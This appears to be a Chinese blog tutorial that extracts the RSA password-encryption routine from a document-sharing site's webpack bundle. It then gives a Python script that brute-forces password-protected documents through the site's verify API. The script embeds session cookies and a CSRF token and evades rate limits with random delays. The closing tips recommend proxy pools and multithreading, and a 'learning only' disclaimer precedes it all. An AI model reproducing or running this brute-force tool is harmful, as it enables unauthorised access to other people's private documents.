前言:本文章仅为技术学习及讨论,不得用此从事非法行为,有问题请联系v:R88988988
aHR0cHM6Ly93d3cueXVxdWUuY29tL3h4eHh4L3h4eHgvZ2J2cDFuZGM5Z2d4Z2dweHojeHYyRXg=
一、找到入口
二、发现加载为加密
三、通过堆栈找加密JS
四、找到加密JS代码
五、构造本地JS
1、由于网站使用的是多文件的WEBPACK,在扣代码时需先找到加载器,将加载器扣下来
2、将需要的模块给扣下来
3、看情况,像是RSA加密,有兴趣的可以自己导包测一下,公钥是:
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfwyOyncSrUTmkaUPsXT6UUdXx\nTQ6a0wgPShvebfwq8XeNj575bUlXxVa/ExIn4nOUwx6iR7vJ2fvz5Ls750D051S7\nq70sevcmc8SsBNoaMQtyF/gETPBSsyWv3ccBJFrzZ5hxFdlVUfg6tXARtEI8rbIH\nsu6TBkVjk+n1Pw/ihQIDAQAB
-----END PUBLIC KEY-----
六、编写爆破Python,开始测试
import execjs
import requests
import time
import random
cookies = {
'aliyungf_tc': '25a87d6e5e4b705840ec1bd3a95836bbc2d93aa190db7f0b00ba798f9dfbd472',
'acw_tc': 'ac11000117154063813522213e8ac35802a892d4f5a4ecdedeca72d50d8c06',
'yuque_ctoken': '-37vzbjTGbW3h2C_No5WhZoa',
'receive-cookie-deprecation': '1',
'lang': 'zh-cn',
}
headers = {
'Accept': 'application/json',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive',
'Content-Type': 'application/json',
'Origin': 'https://www.yuue.com',
'Pragma': 'no-cache',
'Referer': 'https://www.yuue.com/xxxxx/xxxx/gbp1ndc9ggxggpxz',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest',
'sec-ch-ua': '"Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Windows"',
'x-csrf-token': '-37vzbjTGbdh2C_No5WhZoa',
}
with open('test.js', 'r',encoding='utf-8') as f:
ctx_js = f.read()
with open('code.txt', 'r',encoding='utf-8') as f:
n=0
for line in f.readlines():
tp = execjs.compile(ctx_js).call('s', line.strip())
json_data = {
"password": f"{tp}",
}
# try:
res= requests.put('https://www.yuue.com/api/docs/137dddf96/verify',cookies=cookies, headers=headers, json=json_data).text
print(res)
if 'true' in res:
print('密码找到:'+line)
break
if 'Bad Request' in res:
print('Bad Request:'+line)
break
if '操作过于频繁' in res:
print('操作过于频繁:'+line)
break
n+=1
if n==4:
time.sleep(random.uniform(1.1,10.4))
n=1
七、返回
密码无效:
密码正确:
{"data":true}
如果返回是Bad Request,请检查password的密文生成
八、建议
1、建立代理池,采取多线程会对爆破有帮助
2、希望XX雀能提高安全措施,尽快解决该问题